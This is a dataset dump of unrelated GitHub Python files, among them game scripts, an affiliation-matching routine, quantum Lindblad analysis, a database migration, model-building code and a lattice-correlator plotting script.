'score':score, 'bet':bet})\n if len(winners):\n form = f\"Game Over : {', '.join(winners)} won the game {'with a Black Jack ' if blackJack else ''}against the house\"\n else:\n form = f\"Game Over : All players lost to the house\"\n form += \"\\nReplay ?\"\n playing = messagebox.askyesno(title=\"Replay?\", message=form)\n if playing and players == {}:\n playing = False\n gui.recap(players, root)\n sleep(0.1)\n root.destroy()\n return\n\nif __name__ == \"__main__\":\n nogui = \"--no-gui\" in sys.argv\n argv = sys.argv\n if nogui:\n for i,a in enumerate(sys.argv):\n if a == \"--no-gui\":\n argv.pop(i)\n import game_management_nogui as gm\n import players_no_gui as p\n else:\n import game_management as gm\n import players as p\n\n main(argv, nogui)\n","repo_name":"TheyCallMeHacked/BlackJack-INF131","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":4054,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"28366188313","text":"'''搜索最接近的匹配'''\ndef find_closest(look_for, target_data):\n#该函数完成一个简单的线性搜索,返回target_data中与look_for参数最接近的值\n def whats_the_difference(first, second): #嵌套函数\n if first == second:\n return(0)\n elif first > second:\n return(first - second)\n else:\n return(second - first)\n#这个嵌套函数给定两个值,这个函数会返回二者之差\n max_diff = 9999999\n for each_thing in target_data:\n diff = whats_the_difference(each_thing, look_for)\n if diff == 0:\n found_it = each_thing\n break\n elif diff < max_diff:\n max_diff = diff\n found_it = each_thing\n return(found_it)\n#这是运行数据会出现错误,见Demo5","repo_name":"kun375707/Pycharm","sub_path":"K/Demo4.py","file_name":"Demo4.py","file_ext":"py","file_size_in_byte":809,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"12903374296","text":"import pandas as pd\nimport re\nimport unicodedata\nimport Levenshtein\n\n\nfrom sklearn.feature_extraction.text import CountVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\n\nfrom helper_functions import *\n\ndef best_sim_score(l1, l2, l3, l4, simU, simG):\n \"\"\"\n Finds the best match between a 'key word' and several legal names from the ROR database (https://ror.org).\n ---> corrects special cases in the main map that follows\n\n Args:\n l1: List of light affiliations.\n l2: number of candidates.\n l3: List of pairs.\n l4: mult\n\n Returns:\n List: Resulting list containing organization names and their similarity scores.\n \"\"\"\n \n vectorizer = CountVectorizer()\n numUniv = sum([(l1[i].lower()).count('univ') for i in range(len(l1))])\n result = []\n for i in range(len(l1)):\n best = [] \n s = l1[i]\n\n \n for j in range(len(l3)):\n x = l3[j][1] \n \n if [x, l3[j][2]] in result:\n continue\n \n if l4[l3[j][0]] == 1:\n \n if is_contained('univ', x.lower()) and l3[j][2]> simU:\n result.append([x, l3[j][2]])\n elif l3[j][2] >simG:\n result.append([x, l3[j][2]])\n\n \n \n elif l3[j][2] >=0.99:# and (is_contained(\"univ\", x.lower()) or is_contained(\"college\", x.lower()) or is_contained(\"center\", x.lower()) or is_contained(\"schule\", x.lower())): # If the similarity score of a pair (s,x) was 1, we store it to results list\n result.append([l3[j][1], 1])\n \n else:\n try:\n if not is_contained(\"univ\", x.lower()):\n continue # Skip if x does not contain \"university\" or \"univ\"\n \n if (is_contained('hosp', x.lower()) and not is_contained('hosp', s)) or (not is_contained('hosp', x.lower()) and is_contained('hosp', s)) or (is_contained('hopital', x.lower()) and not is_contained('hopital', s)) or (not is_contained('hopital', x.lower()) and is_contained('hopital', s)):\n continue\n s_vector = vectorizer.fit_transform([s]).toarray() #Else we compute the similarity of s with the original affiiation name\n x_vector = vectorizer.transform([x]).toarray()\n \n # Compute similarity between the vectors\n similarity = cosine_similarity(x_vector, s_vector)[0][0]\n if similarity> 0.1:\n similarity_l = 1 - Levenshtein.distance(x, l3[j][0]) / max(len(x), len(l3[j][0]))\n best.append([x, similarity,similarity_l])\n \n except:\n KeyError\n \n if best:\n max_numbers = defaultdict(float)\n for item in best:\n string, number1, number2 = item # Unpack the three elements\n max_numbers[string] = max(max_numbers[string], number1)\n\n reduced_best = [[string, number1, number2] for string, number1, number2 in best if number1 == max_numbers[string]]\n\n# Sort by number1 decreasingly and then by number2 in descending order\n reduced_best.sort(key=lambda x: (x[1], x[2]), reverse=True)\n \n result = result + reduced_best\n \n univ_list = []\n other_list = []\n \n for r in result:\n if is_contained('univ',r[0]):\n univ_list.append(r)\n else:\n other_list.append(r)\n \n limit = min(numUniv, l2)\n\n if len(univ_list)> limit:\n result = univ_list[:limit] + other_list\n \n result_dict = {}\n pairs_dict = {}\n \n \n for l in l3:\n pairs_dict[l[1]] = l[2]\n \n \n for p in result:\n result_dict[p[0]]= pairs_dict[p[0]]\n \n \n \n \n result_dict_list = [[y[0],result_dict[y[0]]] for y in result] \n \n \n return result_dict_list\n \n\ndef index_multiple_matchings(df):\n multiple_matchings = []\n mult = []\n\n for i in range(len(df)):\n result_dict = {}\n \n r_list = [y[3] for y in df.Pairs.iloc[i]]\n modified_list = [item for sublist in r_list for item in sublist]\n r = len(list(set(modified_list)))\n \n for t in [t[0] for t in df.Pairs.iloc[i]]:\n key = t\n if key in result_dict and r>1:\n result_dict[key] += 1\n multiple_matchings.append(i)\n \n else:\n result_dict[key] = 1\n mult.append(result_dict)\n \n return [list(set(multiple_matchings)), mult]\n\n\n\ndef Aff_Ids(m, DF, dix_org, dix_mult, dix_city, dix_country, simU, simG):\n \n \"\"\"\n Matches affiliations in DataFrame 'DF' with names from dictionary 'dix_org' and their ROR_ids based on similarity scores.\n\n Args:\n m (int): The number of DOIs to check.\n DF (DataFrame): The input DataFrame containing affiliation data.\n dix_org (dict): A dictionary of names of organizations and their ROR_ids.\n dix_mult, dix_city, dix_country (dict): Dictionaries that help distinguish between different organizations that have the same name.\n simU (float): Similarity threshold for universities.\n simG (float): Similarity threshold for non-universities.\n\n Returns:\n DataFrame: The final DataFrame with matched affiliations and their corresponding similarity scores.\n \"\"\"\n vectorizer = CountVectorizer()\n\n lnamelist = list(dix_org.keys())\n dix = {} # will store indeces and legalnames of organizations of the DOI { i : [legalname1, legalname2,...]}\n deiktes = [] # stores indeces where a match is found\n similarity_ab = [] # stores lists of similarity scores of the mathces \n pairs = [] # pairs[i] = [ [s,x,t,r] ] where (s,x) is a match, t the corresponding similarity score and r thr ROR_id\n \n for k in range(m):\n similar_k = []\n pairs_k = []\n\n\n for s in DF['Keywords'].iloc[k]:\n\n if s in lnamelist:\n deiktes.append(k)\n similarity = 1\n similar_k.append(similarity)\n \n pairs_k.append((s,s,similarity,dix_org[s]))\n\n if k not in dix:\n dix[k] = [s]\n else:\n dix[k].append(s)\n else:\n\n for x in lnamelist:\n \n if is_contained(s, x):\n\n x_vector = vectorizer.fit_transform([x]).toarray()\n s_vector = vectorizer.transform([s]).toarray()\n\n # Compute similarity between the vectors\n similarity = cosine_similarity(x_vector, s_vector)[0][0]\n if similarity > min(simU, simG):\n if (is_contained('univ', s) and is_contained('univ', x)) and similarity > simU:\n similar_k.append(similarity)\n deiktes.append(k)\n pairs_k.append((s,x,similarity,dix_org[x]))\n\n if k not in dix:\n dix[k] = [x]\n else:\n dix[k].append(x)\n elif (not is_contained('univ', s) and not is_contained('univ', x)) and similarity > simG:\n similar_k.append(similarity)\n deiktes.append(k)\n pairs_k.append((s,x,similarity,dix_org[x]))\n\n if k not in dix:\n dix[k] = [x]\n else:\n dix[k].append(x)\n \n elif is_contained(x, s):\n if (is_contained('univ', s) and is_contained('univ', x)):\n\n if ' and ' in s:\n list_s = s.split(' and ')\n \n if list_s:\n for q in list_s:\n if is_contained('univ', q):\n\n q_vector = vectorizer.fit_transform([q]).toarray()\n x_vector = vectorizer.transform([x]).toarray()\n\n # Compute similarity between the vectors\n similarity = cosine_similarity(q_vector, x_vector)[0][0]\n if similarity > simU:\n similar_k.append(similarity)\n deiktes.append(k)\n pairs_k.append((s,x,similarity,dix_org[x]))\n\n if k not in dix:\n dix[k] = [x]\n else:\n dix[k].append(x)\n \n else: \n\n s_vector = vectorizer.fit_transform([s]).toarray()\n x_vector = vectorizer.transform([x]).toarray()\n\n # Compute similarity between the vectors\n similarity = cosine_similarity(s_vector, x_vector)[0][0]\n if similarity > simU: #max(0.82,sim):\n similar_k.append(similarity)\n deiktes.append(k)\n pairs_k.append((s,x,similarity,dix_org[x]))\n\n if k not in dix:\n dix[k] = [x]\n else:\n dix[k].append(x)\n elif not is_contained('univ', s) and not is_contained('univ', x):\n\n s_vector = vectorizer.fit_transform([s]).toarray()\n x_vector = vectorizer.transform([x]).toarray()\n\n # Compute similarity between the vectors\n similarity = cosine_similarity(s_vector, x_vector)[0][0]\n if similarity > simG: #max(0.82,sim):\n similar_k.append(similarity)\n deiktes.append(k)\n pairs_k.append((s,x,similarity,dix_org[x]))\n\n if k not in dix:\n dix[k] = [x]\n else:\n dix[k].append(x)\n \n similarity_ab.append(similar_k) \n similarity_ab = [lst for lst in similarity_ab if lst != []]\n pairs.append(pairs_k)\n \n \n \n \n## Define the new Dataframe\n \n aff_id_df = pd.DataFrame()\n aff_id_df['Original affiliations'] = list(DF['Original affiliations'].iloc[list(set(deiktes))])\n\n aff_id_df['Light affiliations'] = list(DF['Light affiliations'].iloc[list(set(deiktes))])\n\n aff_id_df['Candidates for matching'] = list(DF['Keywords'].iloc[list(set(deiktes))])\n\n\n aff_id_df['Matched organizations'] = list(dix.values())\n aff_id_df['# Matched organizations'] = [len(list(dix.values())[i]) for i in range(len(list(dix.values())))]\n \n\n aff_id_df['Similarity score'] = similarity_ab\n\n Pairs = [lst for lst in pairs if lst]\n aff_id_df['Pairs'] = Pairs\n aff_id_df['mult'] = index_multiple_matchings(aff_id_df)[1]\n\n\n\n\n## Correct the matchings\n need_check = list(set([i for i in range(len(aff_id_df)) for k in list(aff_id_df['mult'].iloc[i].values()) if k>1]))\n \n\n ready = [i for i in range(len(aff_id_df)) if i not in need_check]\n \n \n best = [ best_sim_score([aff_id_df['Light affiliations'].iloc[i]], len(aff_id_df['Candidates for matching'].iloc[i]), aff_id_df['Pairs'].iloc[i],aff_id_df['mult'].iloc[i], simU, simG) for i in need_check]\n best_o = []\n best_s = []\n \n for x in best:\n best_o.append([x[i][0] for i in range(len(x))])\n best_s.append([round(x[i][1],2) for i in range(len(x))])\n num_mathced = [len(best_s[i]) for i in range(len(need_check))]\n \n\n \n df_final0 = (aff_id_df.iloc[ready]).copy()\n df_final0['index'] = ready\n \n df_final1 = (aff_id_df.iloc[need_check]).copy()\n df_final1['index'] = need_check\n df_final1['Matched organizations'] = best_o\n df_final1['Similarity score'] = best_s\n df_final1['# Matched organizations'] = num_mathced\n \n final_df = pd.concat([df_final0, df_final1])\n final_df.set_index('index', inplace=True)\n final_df.sort_values('index', ascending=True, inplace = True)\n \n #ids = [[dix_org[x] if dix_mult[x] == 'unique' else 'many' for x in v ] for v in final_df['Matched organizations']]\n ids = []\n for i,v in enumerate(list(final_df['Matched organizations'])):\n id_list = []\n for x in v:\n if dix_mult[x] == 'unique':\n id_list.append(dix_org[x])\n else:\n if x in list(dix_city.keys()):\n match_found = False\n\n for city in dix_city[x]:\n if city[0] in (final_df['Original affiliations'].iloc[i]).lower():\n id_list.append(city[1])\n match_found = True\n break \n if not match_found:\n match_found2 = False\n for country in dix_country[x]:\n if country[0] in (final_df['Original affiliations'].iloc[i]).lower():\n id_list.append(country[1])\n match_found2 = True\n break \n \n if not match_found2:\n id_list.append(dix_org[x])\n else:\n id_list.append(dix_org[x])\n ids.append(id_list)\n\n \n \n \n \n new_ror = []\n for v in ids: \n v1 =list(set(v))\n new_ror.append(v1)\n\n new_ror\n \n\n numIds = [len(x) for x in new_ror]\n\n\n final_df['ROR'] = ids \n final_df['# unique RORs'] = numIds\n final_df['unique ROR'] = new_ror\n\n final_df = final_df[~(final_df['# Matched organizations'] == 0)]\n \n final_df = final_df.reset_index(drop=True)\n \n return final_df\n \n","repo_name":"mkallipo/matching","sub_path":"main_functions.py","file_name":"main_functions.py","file_ext":"py","file_size_in_byte":14886,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"10387540944","text":"n = int(input())\r\nregistrar = {}\r\nfor act in range(n):\r\n command = input().split()\r\n if command[0] == \"register\":\r\n if command[1] in registrar and registrar[command[1]] != command[2]:\r\n print(f\"ERROR: already registered with plate number {registrar[command[1]]}\")\r\n else:\r\n registrar[command[1]] = command[2]\r\n print(f\"{command[1]} registered {registrar[command[1]]} successfully\")\r\n elif command[0] == \"unregister\":\r\n if command[1] not in registrar:\r\n print(f\"ERROR: user {command[1]} not found\")\r\n else:\r\n registrar.pop(command[1])\r\n print(f\"{command[1]} unregistered successfully\")\r\n\r\nfor key, value in registrar.items():\r\n print(f\"{key} => {value}\")","repo_name":"mironmiron3/SoftuniPythonFundamentals","sub_path":"SoftUniParking.py","file_name":"SoftUniParking.py","file_ext":"py","file_size_in_byte":759,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"13331326222","text":"import numpy as np\n\ndef colstack(rho):\n return rho.reshape((rho.shape[0]**2,1),order=\"F\") # column stacked\n\ndef uncolstack(rho):\n dim = int(np.sqrt(rho.shape[0]))\n return rho.reshape((dim,dim),order=\"F\") \n\n# calJ is the dictionary lists of (x,y) pairs for each omega\n# pi is a function so that pi(x) is the projector onto the x'th energy space\n# couplers is a list of coupling operators. These must be hermitian,\n# and the sum of their spectral norms squared must be 1. The function\n# checks neither of these.\ndef get_lindblad(calJ, pi, couplers, beta):\n dim = pi(0).shape[0]\n \n def G(omega):\n return min(1, np.exp(-omega*beta))\n \n def S(omega, coupler):\n S_omega = np.zeros((dim,dim)).astype(complex)\n for (x,y) in calJ[omega]:\n S_omega += pi(x) @ coupler @ pi(y)\n return S_omega\n \n out = np.zeros((dim**2,dim**2)).astype(complex)\n\n for coupler in couplers:\n for omega in calJ.keys():\n L = np.sqrt(G(omega)) * S(omega, coupler)\n out += np.kron(L, L.conj())\n LL = L.conj().T @ L\n out -= 0.5 * np.kron(LL, np.eye(dim))\n out -= 0.5 * np.kron(np.eye(dim), LL.T)\n\n return out\n\ndef get_spectral_gap(L):\n L_eigvals = np.real(np.linalg.eigvals(L))\n\n error = None\n \n if len(list(filter(lambda x: np.allclose(x,0),L_eigvals))) != 1:\n error = \"Non-degenerate nullspace.\"\n\n unique_eigvals = np.unique(L_eigvals)\n gap = -np.max(list(filter(lambda x: not np.allclose(x,0), unique_eigvals)))\n\n return gap, error\n\n\ndef check_steady_state(L, rho):\n rho_vec = colstack(rho)\n return np.allclose( np.zeros(rho_vec.shape), L @ rho_vec)\n\n\ndef get_steady_state(L):\n error = None\n\n # only extract one vector in the null space\n #steady_vec = np.linalg.lstsq(L, np.zeros(L.shape[0]),rcond=None)[0]\n L_eigvals, L_eigvecs = np.linalg.eig(L)\n\n if len(list(filter(lambda x: np.allclose(x,0),L_eigvals))) != 1:\n error = \"Non-degenerate nullspace.\"\n\n steady = uncolstack(L_eigvecs[:,0])\n \n if np.allclose(np.trace(steady),0):\n return steady, \"Steady state is traceless.\"\n\n steady /= np.trace(steady)\n\n if error is not None and not np.allclose(steady, steady.conj().T):\n error = \"Steady state is not hermitian.\"\n \n if error is not None and not all(np.real(np.eigvals(steady)) >= 0):\n error = \"Steady state is not positive semi-definite.\"\n\n return steady, error\n\n\n############## Synthesis of coupling operators\n## These are just pauli-X and pauli-Z on each qubit\n\ndef single_qubit_operator(eigv, idx, nqubits, matkey):\n mat = np.array({\n \"X\": [[0,1],[1,0]],\n \"Z\": [[1,0],[0,-1]],\n }[matkey]).astype(complex)\n \n out = np.eye(2**idx).astype(complex)\n out = np.kron(out, mat)\n out = np.kron(out, np.eye(2**(nqubits-idx-1)).astype(complex))\n \n return eigv.conj().T @ out @ eigv\n\ndef make_couplers(eigv):\n nqubits = int(np.log2(eigv.shape[0]))\n norm_factor = (2*nqubits)**(-0.5)\n return [single_qubit_operator(eigv, i,nqubits,key)*norm_factor\n for i in range(nqubits)\n for key in [\"X\",\"Z\"]]","repo_name":"qiskit-research/promised-davies-generator","sub_path":"src/lindblad_analysis.py","file_name":"lindblad_analysis.py","file_ext":"py","file_size_in_byte":3169,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"44"} +{"seq_id":"12346942413","text":"import random\n\n'''This is a classic game of Rock, Paper, Scissors'''\n\ncomp_wins = 0#..................................................variable for computer's wins\nplayer_wins = 0#................................................variable for player's wins\n\ndef choose_option():#...........................................fcn defined to collect yser option\n user_choice = input(\"Choose Rock, Paper, or Scissors: \")#...user's input\n if user_choice in [\"Rock\", \"rock\", \"R\", \"r\"]:#..............if statement for rock\n user_choice = \"r\"#......................................defines rock as user choice\n elif user_choice in [\"Paper\", \"paper\", \"P\", \"p\"]:#..........else if statement for paper\n user_choice = \"p\"#......................................defines paper as user choice\n elif user_choice in [\"Scissors\", \"scissors\", \"S\", \"s\"]:#....else if statement for scissors\n user_choice = \"s\"#......................................defines scissors as user choice\n else:#......................................................final else statement\n print(\"Wrong choice. (Rock, Paper, or Scissors)\")#......error message\n chose_option()#.........................................embeds choose_option fcn\n return user_choice#.........................................pulls out the user coice input\n\ndef computer_option():#.........................................fcn defined to randomize comp_choice\n comp_choice = random.randint(1,3)#..........................makes comp_choice random between 1-3\n if comp_choice == 1:#.......................................if statement that defines 1\n comp_choice = \"r\"#......................................1 = r payload\n elif comp_choice == 2:#.....................................else if that defines 2\n comp_choice = \"p\"#......................................2 = p payload\n else:#......................................................else that defines 3\n comp_choice = \"s\"#......................................3 = s payload\n return comp_choice\n\n\n\nwhile True:\n print(\"\")\n user_choice = choose_option()\n comp_choice = computer_option()\n print(\"\")\n\n if user_choice == \"r\":\n if comp_choice == \"r\":\n print(\"You choose rock. The computer choose rock. Tie game.\")\n elif comp_choice == \"p\":\n print(\"You chose rock. The computer choose paper. You lost :(\")\n comp_wins += 1\n elif comp_choice == \"s\":\n print(\"You chose rock. The computer choose scissors. You won!\")\n player_wins += 1\n\n elif user_choice == \"p\":\n if comp_choice == \"r\":\n print(\"You choose paper. The computer choose rock. You won!\")\n player_wins += 1\n elif comp_choice == \"p\":\n print(\"You chose paper. The computer choose paper. Tie game.\")\n elif comp_choice == \"s\":\n print(\"You chose paper. The computer choose scissors. You lost :(\")\n comp_wins += 1\n\n elif user_choice == \"s\":\n if comp_choice == \"r\":\n print(\"You choose scissors. The computer choose rock. You lost :(\")\n comp_wins += 1\n elif comp_choice == \"p\":\n print(\"You chose scissors. The computer choose paper. You won!\")\n player_wins += 1\n elif comp_choice == \"s\":\n print(\"You chose scissors. The computer choose scissors. Tie game.\")\n\n print(\"\")\n print(\"Player Wins: \" + str(player_wins))\n print(\"Computer Wins: \" + str(comp_wins))\n print(\"\")\n\n user_choice = input(\"Do you want to play again? (y/n)\")\n if user_choice in [\"Y\", \"y\", \"yes\", \"Yes\"]:\n pass\n elif user_choice in [\"N\", \"n\", \"no\", \"No\"]:\n break\n else:\n break\n \n \n \n \n \n \n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n \n \n \n","repo_name":"pittspreneur/Python3","sub_path":"02 Rock, Paper, Scissors Game 1.0.py","file_name":"02 Rock, Paper, Scissors Game 1.0.py","file_ext":"py","file_size_in_byte":3846,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"44"} +{"seq_id":"21464253566","text":"\"\"\"auto\n\nRevision ID: 13fff80e415a\nRevises: 49137a75e3e9\nCreate Date: 2022-12-01 11:52:27.050951\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\nimport sqlmodel\n\n\n# revision identifiers, used by Alembic.\nrevision = '13fff80e415a'\ndown_revision = '49137a75e3e9'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('complexes', 'next_complex_id')\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.add_column('complexes', sa.Column('next_complex_id', sa.INTEGER(), autoincrement=False, nullable=True))\n # ### end Alembic commands ###","repo_name":"Deskent/ci_api","sub_path":"ci_api/migrations/versions/13fff80e415a_auto.py","file_name":"13fff80e415a_auto.py","file_ext":"py","file_size_in_byte":703,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"44"} +{"seq_id":"74636552131","text":"import sys\n# the mock-0.3.1 dir contains testcase.py, testutils.py & mock.py\nsys.path.append('/home/ubuntu/Kaggle_Pytorch_TGS/semantic-segmentation-pytorch')\nfrom models import *\nfrom torchvision.transforms import Normalize\n\ndef build_segmentation_model(in_arch=\"resnet101_dilated8\",out_arch=\"upernet\",droppout=0.1):\n \n '''\n So we allow 3 versions of the model for now: A Resnet 50 101 with Upernet Decoder pre trained on Imagenet \n also a small model \n \n '''\n #First we build two verison of the model for MEan Teacher or not. \n builder = ModelBuilder()\n #Define Encoder\n net_encoder = builder.build_encoder(\n arch=in_arch,\n #fc_dim=2048\n )\n\n #Define Decoder\n net_decoder = builder.build_decoder(\n arch=out_arch,\n fc_dim=2048,\n #weights here lets us load our own weights neat\n num_class=2)\n\n net_encoder_ema = builder.build_encoder(\n arch=in_arch,\n #fc_dim=2048\n )\n\n #Define Decoder\n net_decoder_ema = builder.build_decoder(\n arch=out_arch,\n fc_dim=2048,\n #weights here lets us load our own weights neat\n num_class=2)\n \n class SegmentationModule(SegmentationModuleBase):\n def __init__(self, net_enc, net_dec,drop=0,size=101):\n super(SegmentationModule, self).__init__()\n self.encoder = net_enc\n self.decoder = net_dec\n self.drop=drop\n self.size=size\n \n def forward(self, feed_dict, *, segSize=None):\n inpu=feed_dict['img_data']\n \n encode= self.encoder(inpu, return_feature_maps=True)\n\n if self.drop>0:\n encode[0]=nn.Dropout(self.drop)(encode[0])\n encode[1]=nn.Dropout(self.drop)(encode[1])\n encode[2]=nn.Dropout(self.drop)(encode[2])\n encode[3]=nn.Dropout(self.drop)(encode[3])\n\n pred = self.decoder(encode)\n pred = nn.functional.upsample(pred, size=self.size, mode='bilinear', align_corners=True)\n #Lovasz Softmax needs Sonftmax inputs.\n #pred = nn.functional.softmax(pred, dim=1)\n\n return pred\n \n segmentation_ema=SegmentationModule(\n net_encoder_ema, net_decoder_ema,drop=droppout)\n\n\n \n segmentation_ema=segmentation_ema.cuda()\n\n #Set up the complete model\n segmentation_module = SegmentationModule(\n net_encoder, net_decoder,drop=droppout)\n segmentation_module=segmentation_module.cuda()\n \n for param,param2 in zip(segmentation_ema.parameters(),segmentation_module.parameters()):\n param.data=param2.data\n \n for param in segmentation_ema.parameters():\n param.detach_()\n \n return segmentation_module,segmentation_ema\n \n \n ","repo_name":"leanderloew/Semi-Supervised-Segmentation-Pytorch","sub_path":"model_functions.py","file_name":"model_functions.py","file_ext":"py","file_size_in_byte":2812,"program_lang":"python","lang":"en","doc_type":"code","stars":22,"dataset":"github-code","pt":"44"} +{"seq_id":"41150407939","text":"# VARIOUS SMALL METHODS TO GET A FEEL FOR THE DATA\n# compute how closely two different correlators are correlated\n# compute the fractional error in the correlator\n\nimport gvar as gv\nimport numpy as np\nimport os \nimport sys\nimport matplotlib.pyplot as plt\nfrom scipy.optimize import curve_fit\n\nbp = '../data/hybrid'\nconf= ''\n#l3296f211b630m0074m037m440-coul-v5\n#l3264f211b600m00507m0507m628a-coul-v5\n#l3248f211b580m002426m06730m8447\n#l4864f211b600m001907m05252m6382\ngpls = ['l3248f211b580m002426m06730m8447/onemp_vc_abij_m863.gpl', ] \n\nfiles = [os.path.join(bp, conf, gpl) for gpl in gpls]\n\ncorrs = [gv.dataset.Dataset(f) for f in files]\n\ncorrs = [gv.dataset.avg_data(c) for c in corrs]\n\ncorr1 = corrs[0]['onemp.ll']\n#corr2 = corrs[1]['onemm.HH']\n#corr3 = corrs[1]['onemm.RR']\n#corr4 = corrs[1]['onemp.gg']\n#corr5 = corrs[4]['onemm.RR']\n\ny1 = [abs(x.sdev/x.mean) for x in corr1]\n#y2 = [abs(x.sdev/x.mean) for x in corr2]\n#y3 = [abs(x.sdev/x.mean) for x in corr3]\n#y4 = [abs(x.sdev/x.mean) for x in corr4]\n#y5 = [abs(x.sdev/x.mean) for x in corr5]\n\nprint(corr1)\nprint(y1)\n\nsys.exit(0)\n\n\n## fit data to this function\ndef f( t, A, B):\n\t\treturn A*np.exp(B*t)\n\nT = 9\t# stop plotting here\nTT = 7 # stop fitting here\n\n## do the fit\n#start = (0.1, 0.5)\t\t# parameter search starts here\n#popt, pcov = curve_fit( f, range(TT), y1[:TT], p0=None)\n#print(popt)\n## LEPAGE arg\n#M_ps = gv.gvar('1.366839(72)')\n#M_h = gv.gvar('1.934(80)')\n#M_h = gv.gvar('1.934(80)')\n#print(M_ps.mean - 0.5*M_h.mean)\n#lepage = [ popt[0]*(gv.exp((M_h - M_ps)*t)).mean for t in range(TT) ]\n#fit_exp = [ popt[0]*(np.exp(popt[1]*t)) for t in range(TT) ]\n\nsys.exit(0)\n\nfig, ax = plt.subplots()\n\n#plt.ylim(top=1)\nplt.yscale('log')\nplt.xlabel('t/a')\nplt.ylabel(r'$\\frac{\\sigma_G}{\\overline{G}}', rotation=0, labelpad = 20)\nax.yaxis.set_label_coords(-.1, 0.43)\n#plt.plot([(y1[i]/y3[i]) for i in range(12)], 'ro', label='32 over 10 ape')\nplt.plot(y1[:T], 'ro', label=r'$1^{-+}$ hybrid')\n#plt.plot(lepage, 'r--', label='$1^{-+}$ lepage argument')\n#plt.plot(y2[:T], 'gx', label=r'$1^{--}$ hybrid')\n#plt.plot(y3[:T], 'b+', label=r'$\\bar{\\psi}\\gamma_i\\psi$', markersize=10)\n#plt.plot(fit_exp, 'rx', label='fit to exp')\n#plt.plot(y5[:15], 'bo', label=r'$1^{--} \\bar{\\psi}\\gamma_i\\psi$')\nplt.title('error/mean of correlator', rotation=0)\n#plt.title(conf)\nplt.text(5, 0.0003, 'FINE ENSEMBLE', fontsize=15)\nplt.legend(fontsize=12)\n#plt.savefig('../figures/fractional_error_corr_fineh.png', dpi=500, bbox_inches=\"tight\")\nplt.show()\n","repo_name":"gray95/lattice-analysis","sub_path":"code/diagnostics.py","file_name":"diagnostics.py","file_ext":"py","file_size_in_byte":2482,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"44"} +{"seq_id":"18928333899","text":"import sys,os,logging,glob,pickle,torch,csv,datetime,gc,argparse,math,random, time\nimport numpy as np\nimport tensorflow as tf\nimport pandas as pd \nfrom tensorflow.keras import layers\nfrom tensorflow.keras.callbacks import *\nimport tensorflow_hub as hub\nimport tensorflow_text as text\nfrom sklearn.model_selection import train_test_split\nfrom tensorflow import keras\nfrom transformers import pipeline\n\nfrom sklearn.metrics import accuracy_score\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"--dsn\", default=\"uci\", type=str)\nparser.add_argument(\"--samplecnt\", default=128, type=int)\nparser.add_argument(\"--epoch\", default=12, type=int)\nparser.add_argument(\"--gpu\", default=1, type=int)\nparser.add_argument(\"--reward\", default='hard', type=str) \n\n# ppo \nparser.add_argument(\"--temperature\", default=1.0, type=float) \nparser.add_argument(\"--min_tokens_to_keep\", default=1, type=int) \nparser.add_argument(\"--fbs\", default=16, type=int)\nparser.add_argument(\"--ppo_batchsize\", default=32, type=int)\nparser.add_argument(\"--forward_batch_size\", default=32, type=int)\nparser.add_argument(\"--init_kl_coef\", default=0.2, type=float) \nparser.add_argument(\"--cliprange\", default=0.2, type=float) \nparser.add_argument(\"--cliprange_value\", default=0.2, type=float) \nparser.add_argument(\"--ref_ft\", default=0, type=int)\nparser.add_argument(\"--gpt_ft\", default=0, type=int)\nparser.add_argument(\"--ft_pattern\", default='pp', type=str, choices=['pp', 'tc', 'no'])\nparser.add_argument(\"--ppo_train_epoch\", default=1, type=int)\n\n\nargs = parser.parse_args()\nprint('args==>', args)\n\ngpus = tf.config.experimental.list_physical_devices('GPU')\nif gpus:\n try:\n for gpu in gpus:\n tf.config.experimental.set_memory_growth(gpu, True)\n # tf.config.experimental.set_virtual_device_configuration(gpu, \\\n # [tf.config.experimental.VirtualDeviceConfiguration(memory_limit=1024)])\n except RuntimeError as e:\n print(e)\ndevice = torch.device(\"cuda:{}\".format(args.gpu) if torch.cuda.is_available() else \"cpu\")\nassert device.type=='cuda'\nfrom utils.load_data import * \nfrom utils.transblock import * \nfrom utils.gan_config import * \nfrom utils.ppo_config import * \nassert gpus\n\n\n@tf.function\ndef train_step_gan(prompts_tensor, prompts_syn_tensor, labels_tensor, labels_syn_tensor):\n combined_prompts = tf.concat([prompts_tensor, prompts_syn_tensor], axis=0)\n combined_labels = tf.concat([labels_tensor, labels_syn_tensor], axis=0)\n # generator_ral update\n with tf.GradientTape() as tape:\n predictions = model_gan(combined_prompts)\n loss = keras.losses.SparseCategoricalCrossentropy()(combined_labels, predictions)\n grads = tape.gradient(loss, model_gan.trainable_weights)\n gan_optimizer.apply_gradients(zip(grads, model_gan.trainable_weights))\n return loss\n\n\n\n####### prepare data\nds = load_data(dataset=args.dsn, samplecnt=args.samplecnt)\n#ds, max_len = process_ds(ds)\n\nnum_classes = ds.df_test.label.unique().shape[0]\n\ndef get_model_bert_for_gan(num_classes):\n\n text_input = tf.keras.layers.Input(shape=(), dtype=tf.string) # shape=(None,) dtype=string\n\n encoder = hub.KerasLayer(\"./resource/albert_en_base_2\", trainable=True)\n\n encoder_inputs = preprocessor_layer(text_input)\n outputs = encoder(encoder_inputs)\n embed = outputs[\"pooled_output\"] \n\n if num_classes == 2:\n out = layers.Dense(1, activation='sigmoid')(embed)\n model = tf.keras.Model(inputs=text_input, outputs=out)\n #model.compile(Adam(lr=2e-5), \"binary_crossentropy\", 